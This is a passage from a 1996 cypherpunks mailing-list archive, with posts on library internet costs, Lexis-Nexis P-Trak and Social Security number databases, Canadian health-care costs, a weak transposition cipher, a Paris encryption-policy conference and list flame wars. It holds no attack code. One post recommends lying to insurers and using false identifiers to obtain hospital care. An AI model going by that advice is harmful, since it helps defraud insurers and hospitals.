>But, "being able to afford the hardware is one thing," says a senior VP of
>New York Public Library's Research Libraries.  "Being able to replace it
>year after year and being able to afford the staff to help people use it is
>another.  We could put workstations everywhere, but we don't have enough
>staff.  The equipment is on a three-year, six-thousand-dollar replacement
>cycle.  If people are using things like the World Wide Web, we need one
>staff member out on the floor for every 20 workstations in use...  Right now
>we have 250 workstations for the public, so one staff member for every 20
>workstations becomes a major investment." (Architectural Digest Oct 96 p130)

	I would suspect that one of the following will take place:
	A. Libraries will not wind up getting Internet access subsidized to
any great extent, since they can't afford to pay for the rest of it.
	B. Libraries will get Internet access subsidized, but won't be able
to use it a lot so the subsidy may eventually go by the wayside due to lack
of political support.
	C. Libraries will get everything subsidized.
	-Allen

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>John McCarthy (if your name is John McCarthy;  otherwise, substitute your
>own name).  ...  To cancel, send a message to: listproc@educom.unc.edu with
>the message: unsubscribe edupage.   (If you have subscription problems, send
>mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Thu, 19 Sep 1996 06:14:11 +0800
To: cypherpunks@toad.com
Subject: Re: SSN database scam?
Message-ID: <2.2.32.19960918181651.00706174@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


One thing people forget is that Lexis-Nexis is hardly the first company to
offer this kind of service.  Several years ago, there was a controversy when
Lotus planned to offer this kind of information on CD-ROM.

The main competition of Lexis-Nexis, West Publishing Company ("Westlaw"),
offered this kind of service before Lexis did.  The last I heard, it was
possible to get SSNs via Westlaw.  I don't know if this is still true.

I checked with a friend of mine, and got this response: "Westlaw offers
access to several databases (including its PEOPLE-CB and INFOAM databases).
They provide a person's "Credit Bureau Header," which contains social
security number, previous address(s), telephone number(s), spouse name, date
of birth, related names/aliases, and the date the report was filed."

I happen to work for Lexis-Nexis, but I don't speak for the company.  I work
in a very different part of the company, and don't know the people involved
with P-Trak.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 19 Sep 1996 05:37:41 +0800
To: cypherpunks@toad.com
Subject: Nobody@replay: childish foul [WAS: A daily warning regarding Timothy May]
In-Reply-To: <199609180341.FAA02454@basement.replay.com>
Message-ID: <199609181456.IAA16990@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <199609180341.FAA02454@basement.replay.com>, on 09/18/96 
   at 05:41 AM, nobody@replay.com (Anonymous) said:

= .Timothy C. May is a lying sack of shit.


        OK, children, particularly nobody@replay.com --this is 
    going too far.

    THERE IS NO EXCUSE FOR DIRECT ATTACKS ON TCMAY OR ANYONE ELSE.

        We all pick on someone occasionally, which is acceptable, 
    but "A daily warning regarding Timothy May" as above will (or 
    already is) the death knell of cypherpunks.

        if you are going to be that personal, drop your immature mask,
    attend a SF cypherpunks meeting, find Tim and tell him to his 
    face: "Timothy C. May is a lying sack of shit," try to punch Tim 
    in the nose before he punches you, and let the chips fall where 
    they fall. 

        At least you will be a man, not "A lying sack of coward."

        I don't always agree with Tim, but Tim makes me think about it.
    Cypherpunks was supposedly founded to promulgate _discussion_ of         
    cryptography and related issues of Bill of Rights as it pertains to 
    cryptographical freedom, and the freedom of speech.  

        this list is a political free-for-all; it can be rough around 
    the edges with individual egos and sarcasm, but there is no 
    justification for direct attacks without provocation or reason.  

        nobody@replay has contributed to the list; but if the contr-
    ibutions are to be vitriolic and childish attacks, /dev/null 
    awaits with open arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 19 Sep 1996 06:47:43 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Fear of Flying -- from HotWired
In-Reply-To: <199609181446.HAA10952@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.94.960918144837.7596B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Bill Frantz wrote:

> At  1:21 AM 9/18/96 -0400, Black Unicorn wrote:
> >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:
> >> >Gee, biotech has come a long way.  Now I can download the Anthrax DNA
> >> >sequence from the net and insert it in some carrier bacteria and start
> >> >making Anthrax bacteria.  Neat!
> >
> >Culturing and growing anthrax is painfully simple.  No DNA required.
> 
> Sorry Unicorn, you missed my point.  (1) You need DNA to grow bacteria. 
> You can get the DNA two ways.  (A) You get a sample of the beast, or (B)
> You get a DNA sequence and then regenerate the DNA.  (I don't think B is
> technically feasable yet.)  (2) You can't send samples of the beast thru
> the net.

I think your point was that the net was not responsible for the
proliferation of Anthrax development data.  (Am I wrong?)

My point was that in the eyes of the "leaders" all that is required to
make the net responsible for the proliferation is for the process to be
describeable in a simple one or two page set of instructions (such as
Anthrax is).

> -------------------------------------------------------------------------
> Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
> (408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
> frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Thu, 19 Sep 1996 01:07:41 +0800
To: cypherpunks@toad.com
Subject: SPAMS
Message-ID: <Pine.LNX.3.95.960918145556.20657A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain




Hi,

please focus on the UPPER written text at the bottom.
I think they take it _much_ to easy.

-stephan

---------- Forwarded message ----------
Date: Sun, 15 Sep 1996 17:55:57 +0000
From: Mailer <Mailer@aol.com>
To: LISCIFI@AOL.COM
Subject: Hi!

Pardon the intrusion.  Market study shows this may be of interest to
you.  If you have received this message in error, please hit delete.

***********************************************************

A Personal Invitation

Stop working for someone else!  Put yourself in a position to leave
the 9-5 grind behind!!!

We invite you to listen to the most extraordinary and most powerful
wealth building opportunity in the world and within a few minutes you
will actually hear:

*  How you can make profits of $10,000 within the next 30 days!
*  You never have to leave your home!
*  A financial strategy 100 times more powerful than MLM or ANY OTHER
BUSINESS! *  Where you are paid directly and daily!  (Don't wait for a
company to pay you!)

This is not MLM!  This is not a pipe dream!  This is a real business venture!

                                          800-995-0796 Ext 9263.

**************************************************************

ANY EMAIL ADDRESS PUBLISHED ON THE INTERNET THAT
INVITES COMMERCIAL SOLICITATIONS IS DEEMED AS A
COMMERCIAL ADDRESS, AND AS SUCH IS ELIGABLE FOR
ETHICAL AND LEGAL EMAIL SOLICITATIONS FROM DIRECT
ELECTRONIC MAIL MARKETERS.

IF FOR ANY REASON YOU OBJECT TO RECEIVING THIS MESSAGE
PLEASE POLITELY REQUEST REMOVAL FROM MY LIST BY CLICKING
ON THE REPLY BUTTON AND ENTERING "REMOVE" IN THE
SUBJECT LINE.   IF YOU DO NOT DO SO, I MUST ASSUME YOU WISH
TO RECEIVE FURTHER MAILINGS.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 19 Sep 1996 11:24:49 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Politica.
Message-ID: <9608188430.AA843086679@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


>Black Unicorn <unicorn@schloss.li> wrote:
>> jbugden@alis.com wrote:
>> But I did site one example of a government
>> funded system that *is* less expensive than a market driven one.
>
>I believe this cite was refuted by another poster, that is if you mean the
>Canadian health system.
 
I did not respond to the other poster because it seemed clear that he was not
informed on the subject. While people debate the precise reasons for it, the
Canadian health system spends about two thirds as much as the U.S. system as a
percent of GNP while covering more people as a percent of population. This is a
fact.
 
>> >> Not every victim of lung cancer smokes.
>> >I'll tell you what.  I will give you a dollar for every non-smoking
>> >related lung cancer case, if you give me one for every smoking
>> >related case.
>> 
>> Agreed, with one condition. I get to create a tax on tobacco products
>> and keep this additional revenue.
>
>Uh, what's your point here?
 
This is another way to create risk pool seperation as well as reduce health
costs. Some people will not be able to afford tobacco, reducing the potential
candidates for tobacco related illness. The additonal revenue can be used as a
"risk premium" to fund the related long term medical expenses.
 
>Markets, however, fail far less often then the left would have us believe.
>They also have the rather potent effect of reducing government
>involvement in everyday life.

I don't speak for the left, nor for the right. I don't think that there is a
unified voice on either side of the political spectrum. However I do find it
ironic that market driven health insurance has the potential to be more
intrusive into personal life than many government systems (cf. genetic
screening). 
 
If all you do is replace Big Brother with Big Business, then all that has
changed is the name.

Ciao,
James

"what are cast as one-sided ... guidelines can be recast beneficially as
two-sided trade-offs" - Webb Stacy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Sep 1996 10:29:15 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: Informal Renegotiation of the Law
Message-ID: <3.0b19.32.19960918161831.00a0aebc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:36 PM 9/17/96 -0800, Adamsc wrote:

>It has always seemed somewhat amusing that we will have a) a widespread
opinion
>that homeschooling is of lesser value and b) numerous studies, surveys,
>testimonials, reports, etc, that show what a rotten job public education is
>doing*.   This raises the question of how anyone even remotely concerned with
>their children's welfare could do worse. . .    Yet another unexplained mass
>insanity.

'Gubmint Skools one of the most common forms of child abuse in America
today.  Luckily, the same contradictions in the Stalinist methods of
production that brought the old SU to its knees are working their wonders
on Education as well.  Expect it to die from the top as tertiary education
is seduced away by the cash derived from selling its wares over the Net.
Then with the Web easing Primary and Secondary education at home and the
schools worsening, more people will opt out.  

They will be further encouraged as the schools become the nexus for ever
tighter regulation of family and personal life.  After all, teachers,
nurses, and social workers, work on and with their "charges" to uncover,
child abusers, illegal aliens, substance abusers and who knows what all
among the parents.  The schools also keep loads of records on their
"customers."  Those who have never turned their kids over to the government
for brain massage, find that they have many fewer run ins with the
authorities.

They also find that their kids are more likely to be able to infer, imply,
and know the difference between the two.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Sep 1996 11:23:18 +0800
To: unicorn@schloss.li>
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political.
Message-ID: <3.0b19.32.19960918165617.00a19168@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:44 PM 9/18/96 EST, jbugden@smtplink.alis.ca wrote:

>I did not respond to the other poster because it seemed clear that he was not
>informed on the subject. While people debate the precise reasons for it, the
>Canadian health system spends about two thirds as much as the U.S. system
as a
>percent of GNP while covering more people as a percent of population. This
is a
>fact.

Canada has the world's second most expensive system (after ours) and I
think is a bit closer to 80% of our per cap expenditures.  Canada's costs
and ours used to track pretty well.  When Canada adopted the Provincial
Health Systems model in the mid '60s they fell 20% (relative to us -- while
our costs were exploding because of Medicare-Medicaid).  Since then,
Canadian costs have risen at approx the same rate as ours.  

Per cap expenditures on the uninsured in America are approximately the same
as on the insured.  As are average number of days in hospital, etc.  Most
of the uninsured just go to hospitals and don't pay.  States have various
methods of sharing this cost out.  Interestingly, even though government
expenditures here are 60% of the total, per cap government expenditures on
health care are higher here than in the UK under the Nattie Health.  

Our system is much more expensive than it has to be because the
unrestricted insurance model encourages over consumption.  Americans are
very assertive about getting what's coming to them.  They don't like to
wait.  They can only be restrained by market pricing. 

>This is another way to create risk pool seperation as well as reduce health
>costs. Some people will not be able to afford tobacco, reducing the potential
>candidates for tobacco related illness. The additonal revenue can be used
as a
>"risk premium" to fund the related long term medical expenses.

Course Canada lost it when smuggling defeated the high tax levels on
cigarettes.  This will be more of a problem in the future as more efficient
markets enable more smuggling.
 
>If all you do is replace Big Brother with Big Business, then all that has
>changed is the name.

GM shoots fewer people than the US Gov.  And if they started shooting more
people, their cash flow would suffer.  People are willing to accept less
violence from private institutions, however large, than from governments.

In addition, average institutional size is down.  Big business is smaller.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Sep 1996 09:43:06 +0800
To: cypherpunks@toad.com
Subject: Re: GAK, GAP, GAY
Message-ID: <3.0b19.32.19960918171325.00a0fee4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 9/18/96 -0700, Timothy C. May wrote:
>On a related note, I read an article yesterday about the proposed new
>Health Data Base, with all encounters with any medical institution or any
>health care provider of any sort being cross-linked and cross-referenced.

Which is why some of us lie when we buy private insurance or seek
treatment.  If you "go bare" of course and use different identifiers
whenever you seek treatment there are no problems.  Hospitals have to treat
people anyway under Hill-Burton Act rules and since they have accepted
oligopoly status and have conspired with the Feds to do all sorts of nasty
privacy invasions, I don't see many libertarian problems in taking them up
on their offer of free care.

Private health insurance in Mexico and the UK is also cheap (by US
standards).  If Canada legalizes private insurance, it will be cheaper too.

>And such data bases will be tied to True Names, of course, thus allowing
>the "freezing out" of anyone who is not a True Name, who has fallen behind
>in child support payments, who is late on his income taxes, and so on.

No proposals yet along these lines although smokers might be denied care.

>It doesn't matter if cash is still allowed if one cannot interact with any
>health care person without a proper citizen-unit data base entry. They've
>got you tracked even if you pay in gold dust.

Claim to be a foreigner.

>(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what
>will happen the first time someone dies because a hospital wouldn't treat
>someone without a proper citizen-unit health care card?)

So far it's just for reporting and not authorization purposes.

>P.S. I fully understand that some doctors will treat patients for cash,
>without reporting to The Authorities, just as some doctors will treat
>gunshot wounds without the mandatory reporting of same to the police. This
>does not mean such doctors will be easy to find. The System, if allowed to
>win, will win.

Particularly libertarian physicians.  Also everyone goes to Mexico for
(prescription) drugs these days.  Maybe they will also seek treatment there
or in Canada.

>P.P.S. Many of the things we talk about on the list are being made
>possible--the good and the bad--by computerization. Obviously. Burnham's
>"Age of Privacy" (or maybe it was "The Age of Surveillance"--my copy is not
>handy) made this point many years ago. We are taking the mechanization and
>systematization procedures the Germans used so efficiently in the 1930s and
>modernizing them, with every movement and every transactions tracked and
>recorded in data bases. 

And yet, has anyone noticed any greater sense that we are orderly or in
control.  I think that we are more disordered than we have been in my
lifetime at least.  It obviously hasn't worked yet.  

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Thu, 19 Sep 1996 08:43:24 +0800
To: Alex Le Heux <alexlh@yourchoice.nl>
Subject: Re: Spam blacklist project
In-Reply-To: <Pine.SOL.3.91.960918231647.2090I-100000@sarah>
Message-ID: <9609182121.AA13495@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Not impressed by their setup, there does not seem to be any checking
to see if the mail address is correct (ie to checlk for a denial of
service attack) and the setup requires distributors to submit their
list for "washing". That type of setup may be OK for the bush league
but its hardly cypherpunk type stuff. Its fairly easy to set up a scheme
in which the blacklist can be distributed with no risk to the 
subscribers. Simply use a SHA digests and so on.

I hadn't checked on Yahoo, I tend to use Alta-Vista having found 
Yahoo somewhat arbitary in category definition.

	Phill

PS Sites that use red text on a white background ... ugh!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Thorel <jt@freenix.fr>
Date: Thu, 19 Sep 1996 05:42:39 +0800
To: thorel@netpress.fr
Subject: Cryptologie: Conference internationale - 25 SEPT - Paris
Message-ID: <v03007810ae65c903b5ca@[194.51.213.140]>
MIME-Version: 1.0
Content-Type: text/plain


(message sent to interesting persons - bcc: field)

Conference

The Public Voice and the Development of
International Encryption Policy

Sponsored by

Electronic Privacy Information Center

Global Internet Liberty Campaign
Internet Privacy Coaltion
Open Society Institute - Soros Foundation
Planete Internet

September 25, 1996

Centre de Conférence Internationale
19 Avenue Kleber, Paris 16, France

Program, registration and further information (English):
http://www.epic.org/events/crypto_paris

Or (French)
http://www.netpress.fr/crypto


PARIS, September 16 ‹ The international developement of the Internet leads
governments, users organisations and corporations to find a compromise for
the use and disposal of encryption, which allows to keep the secrecy of
digital communications.
Governments want to keep the possibility to intervene on communications in
order to fight computer crime. The industry (private companies) search a
way to keep an eye on their communications' integrity not to erode their
competitivity. And privacy organisations want to preserve citizens' privacy
and freedom of speech in expression networks such as the Internet.

Before a meeting of governmental experts (under the auspices of the OECD
Sept 26, 27 in Paris), the Electronic Privacy Information Center, a
Washington, DC-based organisation, asked scientists, international right
jurists and associations to meet on September 25 for a conference.

The conference will stresses on legal aspects of computer-based secrecy,
based on propositions made by some countris to create a regime of
"encryption under conditions" (encryption under control), on the Trusted
Third Party Services (TTP) scheme. Companies that will keep encryption keys
of corporations and individuals would have to keep them at disposition of
law enforcement authorities. Who will play this TTP role? Which garanty for
end users? EPIC asked the world's most valuable experts to answer these
questions.

PROGRAM SUMMARY
find the whole and last one at
http://www.epic.org/events/crypto_paris/schedule.html

Cryptographers: Zimmermann (PGP Inc), Diffie (Sun, pub-key system
inventor), Anderson (Cambridge U., UK), Blaze (Bell Lab), etc.

Scientists and experts: Horibe (Hitotsubashi U.), Carpenter (IAB), Simons
(ACM), etc.
Privacy advocates from EPIC (Rotenberg, Banisar), ACLU (Steinhardt),
Privacy International (Davies), and French League for Human Rights.

Officials and/or governmental experts from : OECE crypto & security ad hox
commissions, Attorney General Dept and High Court (Australia), Economic
Ministry (Germany), Austrian Law Institute, etc.

CONTACTS FOR INFO & REGISTRATIONS
€ USA:
EPIC: Mark Rotenberg <rotenberg@epic.org>, Dave Banisar <banisar@epic.org>.
666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544 9240
(tel), +1 202 547 5482 (fax)
€ FRANCE
Planete Internet (Net Press), Paris: Xavier Cany <cany@netpress.fr>, Jerome
Thorel <thorel@netpress.fr>. 191 Av. Aristide Briand, F-94230 Cachan. +33 1
49 08 58 33 (tel), +33 1 49 08 58 31 (fax).




Jerome Thorel           * Planete Internet
Journaliste / ID#72052  * Editor / Redak chef
191 Av. A. Briand       * Tel : (331) 49085830
94230 CACHAN            * web : www.netpress.fr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Thu, 19 Sep 1996 10:59:23 +0800
To: cypherpunks@toad.com
Subject: nt 3.51 file encryptor
Message-ID: <199609182131.RAA07170@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i need a good file encryption routine to run under NT 3.51.
the eaiser to use the better, since this will be used by 
people who otherwise can't spell encryption.

public domain or 3rd party.

cheers,
        -paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 20 Sep 1996 07:31:18 +0800
To: stuart johnson <sjohnson@packetengines.com>
Subject: Re: a simple cypher scheme
In-Reply-To: <9609180005.AA14720@ns.tsinet.com>
Message-ID: <Pine.LNX.3.95.960918173456.1272B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 17 Sep 1996, stuart johnson wrote:

>    i've been on cypherpunks for about a year a half now, and have wacthed
> many interesting threads pass by but i've never posited anything.  what has
> brought me out into the open is this : i work for an engineering firm doing
> asic design, i use pgp ( as do all rational persons ), a co-worker here has
> come up with a 'cypher' scheme that he would like to use to send code to our
> clients.  the scheme is this : he would take the file of code and pad all
> lines to the length of the longest line, he would then preform column swaps,
> and then row swaps, to 'mix up' the file. the person receiving the file
> would then preform the opposite functions to recover the file.  it seems so
> simple that it can't be good. i've convenced him to use pgp, but i would
> like some input if possible on why his cypher scheme is not a good one.

This is a transposition cipher.  The problem with this cipher is that it does
not obscure patterns in the plaintext.  There is no substitution function in
this algorithm.  Secure ciphers have several rounds with both a substitution
and transposition function.  In other words, there is no way this could be
secure.  Tell your co-worker to stick with triple-DES.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkBsASzIPc7jvyFpAQH6Pwf+Jyla3LZADlkaurIapmusjvR5w1xjZ9Oa
1I90YzyKOUmBVzn4ZYabrc4AW4zDAQL6nCuwxy0mR3Zo5cRHMyQ3r2xCZpizgkPu
liJmMvKBOfIv9s5I9+BwE+SwG+Hkp7wEOEyk/t3i1yGzRUTQDj26tZKN4HGQUXt/
ufeCVtHqHIhncak+NEkzlz/VaJ9yMMVWZynp14Ip+S9yB8ztM8LueMp8mCJXSujw
I2ajThu3dCgTaeypVPGnHAipLwuGtxsfuNhBkRPb/XCu/mN3ua6aj52Mp6NUwmwv
rdy0KMuY6W93m9WX8Z+O89R5zBYX9gY7deq8H9BgJXMyVGkkqPvWMA==
=CzZl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Thu, 19 Sep 1996 10:23:04 +0800
To: cypherpunks@toad.com
Subject: official statement from Lexis-Nexis about P-Trak
Message-ID: <2.2.32.19960918220243.006cbbd4@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


This statement was issued today:
--------
STATEMENT FROM LEXIS-NEXIS   9/18/96

Incorrect information is being distributed on Internet newsgroups regarding
the data displayed in LEXIS-NEXIS' P-TRAK file.  P-TRAK is like an
electronic "white pages."  The only information displayed is the name of the
individual, current address and up to two previous addresses and telephone
number.  In some cases, the individual's maiden name may appear and as well
as the month and year of birth.  That is the ONLY information displayed in
the P-TRAK file.

Contrary to some messages that have been posted to some Internet discussion
and news groups, the P-TRAK file DOES NOT contain any credit histories, bank
account information, personal financial data, mother's maiden name or
medical histories.  This misinformation has been posted over and over again
to various news groups.

An example of a record appears below:

Name:  DOE, JOHN E
Current Address:  1066 Anywhere Drive, Dayton, OH  95454
Previous Address:  106 Somewhere Drive, Dayton, OH  92454
Birthdate:  9/1965
Telephone Number:  555-1212
On File Since:  6/1/1994

The information displayed in the P-TRAK file is the type of information
readily available from public information sources such as telephone
directories (in print and CD-ROM format) and public records maintained by
government agencies.

LEXIS-NEXIS markets the P-TRAK file to the legal community for use by
general legal practitioners, litigators and public attorneys, as well as law
enforcement agencies and police departments.  These professionals use the
P-TRAK file to assist in locating litigants, witnesses, shareholders,
debtors, heirs and beneficiaries.

LEXIS-NEXIS is aware of the sensitivities regarding the potential misuse of
information.  Business competitors of LEXIS-NEXIS have for some time made
Social Security numbers available to users of their services.  In addition,
Social Security Numbers and other information are available on the Internet
from a number of sources.  Despite this wide availability of Social Security
numbers in the market place, LEXIS-NEXIS discontinued the display of Social
Security numbers in the P-TRAK file as of June 11, 1996, eleven days after
the product was introduced.

Through its actions, LEXIS-NEXIS is balancing the privacy concerns of the
public with the legitimate needs of legal, business and government
professionals for access to accurate sources of publicly available
information.  By discontinuing the display of Social Security numbers in
P-TRAK and only providing information that is already available to the
public from other sources, LEXIS-NEXIS believes it has responsibly met the
expressed concerns of the public.

Individuals interested in having their names removed from the P-TRAK file
can e-mail their full name and complete address to:
p-trak@prod.lexis-nexis.com or mail this information to ATTN: P-TRAK, P. O.
Box 933, Dayton, OH 45401.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 19 Sep 1996 09:22:14 +0800
To: Chip Mefford <cmefford@avwashington.com>
Subject: author/subject ratings sharing, Bryce's cpunks killfile was: Re: cypherpunk listserve usefuln
In-Reply-To: <v03007801ae65b79e711a@[207.79.65.35]>
Message-ID: <199609181615.SAA19920@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 A million monkeys operating under the pseudonym "Chip Mefford 
 <cmefford@avwashington.com>" typed:
> 
> As much as it shames me, I have recently discovered that by filtering
> messages from only 2 participants and setting body filters on 3 keywords
> have remarkably improved the usefulness of this listserve.
> 
> As much as I do enjoy some of the filtered subject matter, I really feel it
> is very off subject and makes this listserver useless for the intended task.
> 
> I guess that makes me a censor and it has me reexamining some things.


It is very confusing to _me_, Chip, that you are ashamed of this
or that it has shaken your beliefs somehow.  Is it that you are
not aware of the distinction between coercive "silencing of the
speaker" censorship and non-coercive "ceasing to list to the
speaker" censorship?


I would love to know the two names and three subjects.  In the
spirit of reciprocation, here is a file called "cpunks.filter" 
I have.  I currently process it by hand or with simple tcsh 
scripts.  Actually I don't actually refer to this file very 
often.


- ------- begin included file "cpunks.filter" -------
Authors:

Bryce 9
Black Unicorn 7
Duncan Frissell 7
Robert A. Hettinga 7
Lucky Green 7
Sandy Sandfort 7
Hal 7
Perry E. Metzger 7
Tim May 7
John Young 5
llurch 5
Rick Smith 5
Jim Bell 0
Vulis 0



Subjects:

DigiCash 9
Ecash 9
Chaum 8
nym 7
Java 5 
trust 5
government 0
policy 0
escrow 0
GAK 0
terror 0
freeh 0
clinton 0
whitehouse 0
white house 0
FBI 0
NSA 0
export 0
munition 0

- ------- end included file "cpunks.filter" -------



Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkAgBEjbHy8sKZitAQGC+gMAwQI3ltFVB7H3nrL9b6QZkcYX/VqXnAxQ
cHA8KKVic4U/BvAKukCkxyIT2yKGSX+wyMiLmJ1eSbH2pa/zLGI1+OX0ySLCQgnF
FLuc4H/AeRgm0f7TM2r62u3VnFoAcFlg
=bUu/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michelle Thompson <mthompso@qualcomm.com>
Date: Thu, 19 Sep 1996 11:48:52 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics, is now Mercenarial Stuff
Message-ID: <2.2.32.19960919011631.002f9c0c@strange.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: kwheeler@intellinet.com
>Date: Wed, 18 Sep 1996 20:08:18 -0500
>X-Sender: kwheeler@intellinet.com
>To: Michelle Thompson <mthompso>
>Subject: Re: Assassination Politics, is now Mercenarial Stuff
>
>Loosely the term mercenary means one who does a job solely for
>profit.  Technically, as outlined in Article 47 of Protocol I 
>Additional to the Geneva Convention of 1949:
>
>" 2. A mercenary is a person who:
>
> (a) is specially recruited locally or abroad in order to
>     fight in an armed conflict;
>
> (b) does, in fact, take a direct part in the hostilities;
>
> (c) is motivated to take part in the hostilities by the desire
>     for private gain, and, in fact, is promised by or on behalf
>     of a party to the conflict, material compensation substaintially
>     in excess of that promised or paid to combatants of _simliar_
>     ranks (my added emphasis -KMW) and functions in the armed forces
>     of that party;
>
> (d) is neither a national of a party to the conflict nor a resident of
>     terrritory controlled by a part to the conflict;
>
> (e) is not a memeber of the armed forces of a party to the conflict;
>"
>
>
>The foreign legions of France, Spain, and Libya are considered to be
>part of the armed forces of those nations, and therefore, strictly speaking,
>personnel enlisted in these forces are _not_ mercenaries.
>
>I had to go dig that info up to see if I had remembered things
>somewhat correctly...
>
>-K
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 19 Sep 1996 11:55:32 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: GAK, GAP, GAY
In-Reply-To: <ae657f56110210042afc@[207.167.93.63]>
Message-ID: <199609190117.SAA04924@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>On a related note, I read an article yesterday about the proposed new
>Health Data Base, with all encounters with any medical institution or any
>health care provider of any sort being cross-linked and cross-referenced.
>The privacy concerns are supposedly handled by having "security tickets"
>for various hospital officials, researchers (!!), insurance companies, and
>law enforcement. (I put the "!!" next to the "researchers" because I don't
>recall releasing my medical and dietary history to any so-called
>"researchers." While I have no doubt that many "data miners" would like
>access to such national data bases, and that some potentially valuable
>information could be gleaned, I didn't release this information for Joe
>Gradstudent, Ph.D. candidate to sift through.)

its worth noting that mapping the human genome is related to 
health records and privacy issues. essentially scientists have
made tremendous progress in mapping out what diseases are caused
by what genes. much of this is done with the power of correlating
gene mutations with actual health records among the population,
the more the better.

science progresses on openness. there are legitimate reasons to
have large databases of private records. I do believe such things
could be accomplished while protecting the privacy of individuals
yet giving the benefits to researchers.  imagine the concepts
of blinding and zero-knowledge protocols applied to health databases.
it seems reasonable that this can be worked out.

one interesting idea: imagine a system in which "blinding" is 
an accepted and basic form of interaction between patients and
doctors. the patients give only a self-generated ID to the
health care provider. the system is set up such that the 
provider can do all functions necessary to them (keeping
records, billing the insurance company) through the 
"blinding" process. this has a lot of potential. it seems
that we could take the blinding process and possibly push
for it to be an accepted way of doing business.

there's a lot of use for someone to do what Chaum has
done for digital cash, i.e. show that all operations 
necessary to commerce can be supported via blinding-- taking
that kind of mapping, and moving it into all other areas
of human endeavor. even just rewriting his own papers
to be specific to particular fields like the health
arena would be a breakthrough at the moment.

p.s. I fail to see why calling you "timmy" is considered
an ad hominem attack. quite to the contrary, I assure you
it is a term of endearment <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 19 Sep 1996 10:53:28 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political.
Message-ID: <9608188430.AA843096378@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> wrote:
